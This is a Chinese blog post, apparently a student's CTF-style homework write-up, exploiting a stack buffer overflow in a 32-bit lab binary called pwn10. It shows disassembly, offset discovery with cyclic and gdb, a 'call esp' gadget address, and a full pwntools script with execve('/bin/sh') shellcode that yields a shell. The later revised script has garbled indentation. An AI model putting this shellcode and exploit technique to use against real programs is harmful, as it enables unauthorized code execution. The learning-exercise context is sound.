pwn10详细过程

最新推荐文章于 2025-02-23 08:24:22 发布
最新推荐文章于 2025-02-23 08:24:22 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: 安全 文章标签: 安全 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42072280/article/details/90342652
版权

 

题目均为linux 32系统静态链接编译程序,关闭栈执行保护

要求:

1.需在Linux系统下安装pwntools。

2、编写python脚本,基于pwntool在本地加载目标测试程序,

通过脚本给程序灌入输入数据,构造的输入数据需绕过程序各种校验条件,达到漏洞触发路径,最后构造能够利用漏洞的样本。

 

题目中说了是32位系统的程序,但是如果没有说明的话,需要自己辨别,之前浏览博客的时候看到一个命令可以解决这个问题,当时没有保存,

现在找不见了,等以后找见了再补过来。

 

 

关闭地址随机化

ningan@ubuntu:~$ sudo sysctl -w kernel.randomize_va_space=0
kernel.randomize_va_space = 0

 

 

1.先执行这个可执行文件  发现有个字符串

 

ningan@ubuntu:~/anan/hw$ ./pwn10
Do you want the secret?
Now , give me your key:3
a
YQ==ningan@ubuntu:~/anan/hw$ 
ningan@ubuntu:~/anan/hw$ 

 

 

2.到ida中用search->text (Alt + t),输入关键字符,例如:secret,找到那个字符串的位置  那就是主函数的入口 

 

.text:08048DA0 ; __unwind {
.text:08048DA0                 push    ebp
.text:08048DA1                 mov     ebp, esp
.text:08048DA3                 sub     esp, 98h
.text:08048DA9                 sub     esp, 0Ch
.text:08048DAC                 push    offset aDoYouWantTheSe ; "Do you want the secret?"
.text:08048DB1                 call    sub_804F9C0
.text:08048DB6                 add     esp, 10h
.text:08048DB9                 sub     esp, 0Ch
.text:08048DBC                 push    offset aNowGiveMeYourK ; "Now , give me your key:"
.text:08048DC1                 call    sub_804F230
.text:08048DC6                 add     esp, 10h
.text:08048DC9                 sub     esp, 8
.text:08048DCC                 lea     eax, [ebp-0Ch]
.text:08048DCF                 push    eax
.text:08048DD0                 push    offset aD       ; "%d"
.text:08048DD5                 call    sub_804F270
.text:08048DDA                 add     esp, 10h
.text:08048DDD                 mov     eax, [ebp-0Ch]
.text:08048DE0                 cmp     eax, 0Ah
.text:08048DE3                 jle     short loc_8048E07
.text:08048DE5                 mov     eax, [ebp-0Ch]
.text:08048DE8                 cmp     eax, 1
.text:08048DEB                 jz      short loc_8048E07
.text:08048DED                 sub     esp, 0Ch
.text:08048DF0                 push    offset aWrongKey ; "Wrong key!"
.text:08048DF5                 call    sub_804F230
.text:08048DFA                 add     esp, 10h
.text:08048DFD                 sub     esp, 0Ch
.text:08048E00                 push    0               ; status
.text:08048E02                 call    sub_804E8A0

 

 

 

3.F5反汇编 看到伪代码

 

int sub_8048DA0()
{
  int v1; // [esp-90h] [ebp-90h]
  signed int v2; // [esp-10h] [ebp-10h]

  sub_804F9C0("Do you want the secret?");
  sub_804F230("Now , give me your key:");
  sub_804F270("%d", &v2);
  if ( v2 > 10 && v2 != 1 )
  {
    sub_804F230("Wrong key!");
    sub_804E8A0(0);
  }
  sub_80511D0();
  sub_804F840(&v1);
  sub_80489F6(&v1);
  return sub_804F230("%s");
}

 

 

 

4.分析伪代码  发现有溢出可以利用

 

分析该伪代码,结合之前在linux系统中运行结果分析如下:

运行代码,首先输出:Do you want the secret?  Now, give me your key:

当我们输入小于等于10但是不等于1的一个整数时,会提示我们继续输入(在函数sub_804F840)

然后下一个函数(sub_80489F6)会对输入的字符进行BASE65编码

最后一个函数(sub_804F230)对这个编码进行输出

 

ningan@ubuntu:~/anan/hw$ ./pwn10
Do you want the secret?
Now , give me your key:3
a
YQ==ningan@ubuntu:~/anan/hw$ 
ningan@ubuntu:~/anan/hw$ 

 

 

5.利用

 

(1)找返回地址

1)利用cyclic函数生成一些随机字符

ningan@ubuntu:~/anan/hw$ cyclic 200

 

2)进入gdb,在主函数0x08048da0处下断点,运行,利用刚刚生成的随机字符来覆盖栈上的数据

ningan@ubuntu:~/anan/hw$ gdb -q pwn10
gdb-peda$ b *0x08048da0
Breakpoint 1 at 0x8048da0
gdb-peda$ run
gdb-peda$ c

 

Continuing.
Python Exception <class 'AttributeError'> 'module' object has no attribute 'commands': 
Do you want the secret?
Now , give me your key:3
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab
YWFhYWJhYWFjYWFhZGFhYWVhYWFmYWFhZ2FhYWhhYWFpYWFhamFhYWthYWFsYWFhbWFhYW5hYWFvYWFhcGFhYXFhYWFyYWFhc2FhYXRhYWF1YWFhdmFhYXdhYWF4YWFheWFhYXphYWJiYWFiY2FhYmRhYWJlYWFiZmFhYmdhYWJoYWFiaWFhYmphYWJrYWFibGFhYm1hYWJuYWFib2FhYnBhYWJxYWFicmFhYnNhYWJ0YWFidWFhYnZhYWJ3YWFieGFhYnlhYWI=
Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
EAX: 0x10c 
EBX: 0x80481b0 (push   ebx)
ECX: 0xffffffff 
EDX: 0x80ed4d4 --> 0x0 
ESI: 0x80ec00c --> 0x8065430 (mov    edx,DWORD PTR [esp+0x4])
EDI: 0x30 ('0')
EBP: 0x6261616b ('kaab')
ESP: 0xffffd0f0 ("maabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
EIP: 0x6261616c ('laab')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x6261616c
[------------------------------------stack-------------------------------------]
0000| 0xffffd0f0 ("maabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
0004| 0xffffd0f4 ("naaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
0008| 0xffffd0f8 ("oaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
0012| 0xffffd0fc ("paabqaabraabsaabtaabuaabvaabwaabxaabyaab")
0016| 0xffffd100 ("qaabraabsaabtaabuaabvaabwaabxaabyaab")
0020| 0xffffd104 ("raabsaabtaabuaabvaabwaabxaabyaab")
0024| 0xffffd108 ("saabtaabuaabvaabwaabxaabyaab")
0028| 0xffffd10c ("taabuaabvaabwaabxaabyaab")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x6261616c in ?? ()
Python Exception <class 'AttributeError'> 'module' object has no attribute 'commands': 
gdb-peda$ 
 

3)计算返回地址

说明:我用的是gdb-peda,在gdb中不能用cyclic函数。

但是组里的其他同学直接用gdb,或是pwngdb都可以直接用,这样子就可以直接找到返回地址前面输入了多少个字符。

 

gdb-peda$ cyclic 200
Undefined command: "cyclic".  Try "help".

gdb-peda$ cyclic_find(0x6261616c)
Undefined command: "cyclic_find".  Try "help".
 

但是我不能用啊,我就找了一个最简单粗暴的方法:数。因为cyclic函数生成的字符是有规律的,如下:

aaaa

baaa

caaa

...

xaaa

yaaa

zaab

baab

caab

daab

...

kaab

laab

maab

...

可以看到在laab前面有144个字符,就是说返回地址的前面我们填充了144个字符。

 

 

 

(2)构造payload

参考demo的例子

demo里是这样子构造的  sendPayload(p,'a'*44 + p32(0x080e5837) + shellcode + '\n')  

0x080e5837这个地址是call esp指令的地址,call esp的汇编指令时FFD4

我们可以仿照这个找pwn10中call wap指令的地址。如下:

 

在ida中search->sequence of bytes,输入:FF D4

 

点击“c”,将其转换为代码,如下:

 

'a'*144 + p32(0x080cb770) + shellcode

 

6.编写攻击代码

 

我:我改了这个和这个,但是怎么攻击不成功呢?

女神:那个demo的攻击代码看懂了吗?

我:没有

女神:看去

我:好

 

 

ningan@ubuntu:~/anan/hw$ vim pwn10.py
ningan@ubuntu:~/anan/hw$ python pwn10.py ./pwn10
[+] Starting local process './pwn10': pid 4855
Enter a number: 3
[*] Switching to interactive mode
YWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhcLcMCJCQkJBqaGgvLy9zaC9iaW6J42gBAQEBgTQkcmkBATHJUWoEWQHhUYnhMdJqO1iD6DDNgA==$ ls
core            peda-session-pwn_demo.txt  pwn04  pwn08     pwn_demo
linux_server        pwn01               pwn05  pwn09     pwn_demo.py
peda-session-pwn03.txt    pwn02               pwn06  pwn10
peda-session-pwn10.txt    pwn03               pwn07  pwn10.py
$ whoami
ningan
$ exit
[*] Got EOF while reading in interactive
$ quit
[*] Process './pwn10' stopped with exit code 127 (pid 4855)
[*] Got EOF while sending in interactive
ningan@ubuntu:~/anan/hw$ 

 

 

攻击成功

 

 

代码如下:

#!/usr/bin/env python
#coding=utf-8

from pwn import *
import sys
context.arch='i386'
context.log_level='info'

def sendPayload(p,payload):
        p.send(payload)

def pwn10(bin_path):
        shellcode='909090906a68682f2f2f73682f62696e89e368010101018134247269010131c9516a045901e15189e131d26a3b5883e830cd80'.decode('hex')

        p=process(bin_path)
        p.settimeout(0.1)
        p.recvuntil(':')
        x = raw_input("Enter a number: ")
        sendPayload(p,x)
        sendPayload(p,'a'*144 + p32(0x080cb770) + shellcode + '\n')
        p.interactive()

if __name__ == '__main__':
        pwn10(sys.argv[1])

 

ningan@ubuntu:~/anan/hw$ cat pwn10.py
#!/usr/bin/env python
#coding=utf-8

from pwn import *
import sys
context.arch='i386'
context.log_level='info'

def sendPayload(p,payload):
    p.send(payload)
    
def pwn10(bin_path):
    shellcode='909090906a68682f2f2f73682f62696e89e368010101018134247269010131c9516a045901e15189e131d26a3b5883e830cd80'.decode('hex')
    
    p=process(bin_path)
    p.settimeout(0.1)
    p.recvuntil(':')
    x = raw_input("Enter a number: ")
    sendPayload(p,x)
    sendPayload(p,'a'*144 + p32(0x080cb770) + shellcode + '\n')
    p.interactive()
    
if __name__ == '__main__':
    pwn10(sys.argv[1])
 

仿照pwn_demo.py编写

先输入一个<=10但是不为1的数字,然后输入我们构造好的字符串

pwn,攻击成功!

 

 

 

 

 

改进:之前的攻击需要手动输入一个数字,比较麻烦,我们利用下面的代码,将数字直接注入,

#!/usr/bin/env python
#coding=utf-8

from pwn import *
import sys
context.arch='i386'
context.log_level='info'

def sendPayload(p,payload):
    p.send(payload)
    
def pwn10(bin_path):
    shellcode='909090906a68682f2f2f73682f62696e89e368010101018134247269010131c9516a045901e15189e131d26a3b5883e830cd80'.decode('hex')
    
    p=process(bin_path)
    p.settimeout(0.1)
    p.recvuntil(':')
    #x = raw_input("Enter a number: ")
        sendPayload(p,'4'+'\n')
        sendPayload(p,'a'*144 + p32(0x080cb770) + shellcode + '\n')
           p.interactive()
    
if __name__ == '__main__':
    pwn10(sys.argv[1])

$ cat pwn10.py
#!/usr/bin/env python
#coding=utf-8

from pwn import *
import sys
context.arch='i386'
context.log_level='info'

def sendPayload(p,payload):
    p.send(payload)
    
def pwn10(bin_path):
    shellcode='909090906a68682f2f2f73682f62696e89e368010101018134247269010131c9516a045901e15189e131d26a3b5883e830cd80'.decode('hex')
    
    p=process(bin_path)
    p.settimeout(0.1)
    p.recvuntil(':')
    #x = raw_input("Enter a number: ")
        sendPayload(p,'4'+'\n')
        sendPayload(p,'a'*144 + p32(0x080cb770) + shellcode + '\n')
           p.interactive()
    
if __name__ == '__main__':
    pwn10(sys.argv[1])
 

要注意加\n,要不然攻击成功之后,输入命令就会直接退出。

 

用gdb查看内存

格式: x /nfu <addr>

说明
x 是 examine 的缩写

n表示要显示的内存单元的个数

f表示显示方式, 可取如下值
x 按十六进制格式显示变量。
d 按十进制格式显示变量。
u 按十进制格式显示无符号整型。
o 按八进制格式显示变量。
t 按二进制格式显示变量。
a 按十六进制格式显示变量。
i 指令地址格式
c 按字符格式显示变量。
f 按浮点数格式显示变量。

u表示一个地址单元的长度
b表示单字节,
h表示双字节,
w表示四字节,
g表示八字节

 

❤️超详细PWN新手入门教程❤️《二进制各种漏洞原理实战分析总结》
Test网络安全
09-15 1万+
本部分将对常见的二进制漏洞做系统分析,方便在漏洞挖掘过程中定位识别是什么类型漏洞,工欲善其事,必先利其器。 0x01栈溢出漏洞原理 栈溢出漏洞属于缓冲区漏洞的一种,实例如下: #include <stdio.h> #include <string.h> int main() { char *str = "AAAAAAAAAAAAAAAAAAAAAAAA"; vulnfun(str); return; } int vulnfun(char *st
PWN入门之Stack Overflow
2401_84434570的博客
05-06 1074
看一下正常情况,如果是正常情况的话,会返回到main函数中,这里需要注意一个细节,EIP这个寄存器,计算机会执行EIP指向的东西。根据这个原理,就可以进行构造,当ret的时候,EIP指向的东西为success函数的地址即可,这样就可以调用success函数了,从而达到劫持程序流的目的。在本篇文章中,我详细介绍了如何利用程序中本身存在的栈溢出漏洞,达到劫持程序流的目的,进而实现system("/bin/sh")的效果,如果你也对这个知识点感兴趣,欢迎阅读全文,内容篇幅较长,阅读时长约12分钟。
Pwn学习流程
cm_zl
04-23 505
Pwn前置技能: 汇编语言 C语言 python linux系统 Pwn环境搭建: ubantu(64位) python2 pip pwntools pwndbg 32位libc库 ……
pwn 程序保护
qq_40390383的博客
09-12 658
printf("%d", a) ,参数 a 在堆栈中的是 a 的地址, printf("%d",a)堆栈的结构 结合此题的堆栈的数据顺序 格式化字符串漏洞: 正常情况下printf("%s", a) 是输出a的值,但是如果直接使用 printf(a),虽然也可以输出a的值,但如果a中含有%x等格式化字符时,变会出现泄漏内存的情况 我们便在参数区输入 pwnme 的地址,利用%n 来更改其数值。 %n - 到目前为止所写的字符数 构造如下的 payload p32(pwnme_addr) +..
Pwn 课程第五节: 栈溢出漏洞利用
最新发布
weixin_44948224的博客
02-23 1801
栈溢出漏洞利用(Stack Buffer Overflow Exploitation)是 Pwn 领域最基础也是最常见的攻击方式之一。其核心思想是利用程序未正确检查用户输入的长度,导致缓冲区溢出,覆盖返回地址,最终劫持程序控制流。了解栈溢出漏洞的基本原理。通过和计算偏移量。通过覆盖返回地址实现代码执行。了解ret2libc技术,绕过 NX 保护。
pwn入门
weixin_74485208的博客
03-19 2005
CTF中的pwn指的是通过通过程序本身的漏洞,编写利用脚本破解程序拿到主机的权限,这就需要对程序进行分析,了解操作系统的特性和相关漏洞,是是一个难度比较大的分支。接下来介绍相关的学习思路(自己总结的,当作参考)
PWN基础
Civit_的博客
03-27 953
学习pwn的基础
CTF-PWN相关程序素材积累
weixin_41038905的博客
04-21 465
PWN简介 pwn,在安全领域中指的是通过二进制/系统调用等方式获得目标主机的shell。pwn是一个黑客语法的俚语词 ,是指攻破设备或者系统 。发音类似“砰”,对黑客而言,这就是成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被你操纵Linux下的pwn常用到的工具有: gdb:Linux调试中必要用到的 gdb-pedagdb方便调试的工具,类似的工具有gef,gdbinit,这些...
pwn栈溢出10道练习题有writeup
01-04
在这个场景中,"pwn栈溢出10道练习题有writeup" 提供了10个关于栈溢出的实战练习,每个题目都配有详细的解答,这对于学习和理解栈溢出漏洞原理及其利用技术非常有帮助。 栈溢出是由于程序在栈上分配的内存不足,...
PWN不欢沙龙演讲PPT.rar
05-20
10. **安全编程**:学习PWN的目的是为了更好地防止攻击,了解常见的编程陷阱和如何避免它们是每个开发者的必修课。 通过这个"无PWN不欢沙龙演讲PPT",观众可能学到了如何识别、利用和防范各种类型的漏洞,同时也会...
掌握pwn技术栈溢出技巧的10道练习题及解答
- 题目解答:在一些writeup中,还会包括对题目的完整解答,如获得flag的详细过程。 4. CTF竞赛: CTF是一种信息安全竞赛,涉及多种信息安全技能,包括但不限于逆向工程、密码学、网络攻防和二进制漏洞利用等。CTF...
pwn-入门系列-0
lulu
07-05 1416
PWN 简单介绍: pwn简介 环境配置 工具准备 技能要求 ==>开始pwn之路 0x01 PWN是什么 ”Pwn”是一个黑客语法的俚语词,是指攻破设备或者系统 。发音类似“砰”,对黑客而言,这就是成功实施黑客攻击的声音——砰的一声被“黑”的电脑或手机就被你操纵了. --百度百科 0x02 环境配置: 1.Ubuntu 32位/64位虚拟机. 2.IDA pro 3.Pwntoo...
【二进制安全PWN基础入门大全(非常详细)零基础入门到精通,收藏这一篇就够了
热门推荐
leah126的博客
07-25 1万+
PWN是一个黑客之间使用的词语,通常指攻破设备或系统。发音类似“砰”,对黑客而言,这象征着成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被操纵了。在网络安全语境中,PWN通常指的是通过不同的攻击手段如利用漏洞、进行社会工程学攻击等方法成功地获得了一个设备、系统或网络的未授权控制权。一旦攻击者“PWN了”一个系统,他们就可以执行各种恶意活动,如窃取数据、安装恶意软件或制造更广泛的破坏。
pwn学习笔记——基本操作流程记录(stuing)
weixin_45551695的博客
05-26 323
1栈溢出 复制到里面去 得到长度 基本流程大概记录一下,之后具体补充
PWN入门&Protostar靶场Stack系列
永远都没有了
01-24 1380
pwn入门靶场笔记
gdb调试之超长字符生成与定位
Xor0ne
04-19 2299
这篇文章主要讲解 kali 超长字符生成以及运行后定位溢出点的的几种方法。 文章目录一、源码二、编译三、调试过程**接下来,我们怎么判断程序是否存在溢出呢?——objdump**1、确定payload结构2、 查看system所在的相关函数3、填充字符个数方法一:msf方法二:peda——pattern方法三:pwntools——cyclic四、生成exp文件附录一: 一、源码 首先,老规矩,我们...
linux下gdb调试circle_x.c
natureworld2010的博客
07-14 363
终端使用gdb调试circle_x.c gdb就是GNU debugger 通过调试circle_x.c演示gdb调试器的使用。 调试使用的源码circle_x.c 实现输入半径得到面积的功能。 源码如图示。 源码实现效果如图示。 生成可调试文件 通过gcc -g circle_x.c -o circle_x.debug命令生成可调试文件 gdb circle_x.debug进入调试环境 gdb circle_x.debug 命令进入调试环境 run 命令执行运行过程 直接运行,如无bug直接输出结
pwn,获取系统权限,入门题,cyclic
weixin_42072280的博客
05-19 3820
https://blog.csdn.net/SanOrintea/article/details/82288959 大部分还是按照这个来的,就是关于数前面有多少个字符的时候,这个博客是用cyclic -l来数的,但是我在gdb中运行这个命令的时候显示有错误, 我觉得可能是因为那个博客是pwndbg,我是gdb-peda,所以,我就是列了这200个字符的规律,数了一下,当然按...
gdb 查看是否 栈溢出_64位Linux栈溢出教程
weixin_39782355的博客
01-17 914
0x01这一系列的文章目的在于快速介绍对缓冲区溢出(在64位下linux二进制程序)弱点的利用。该系列教程适合人群为:熟悉利用32位二进制程序并想应用它们的知识来利用64位二进制程序。该教程是长期的零散笔记,整理总结成的结果。搭建环境在64位与32位linux平台下编写其二进制的利用程序区别不大,然而我们将遇到一些陷阱,学习这种技术最好的方法是实践它,因此我鼓励你跟着教程一起实践。我将在Unbun...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安安csdn

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值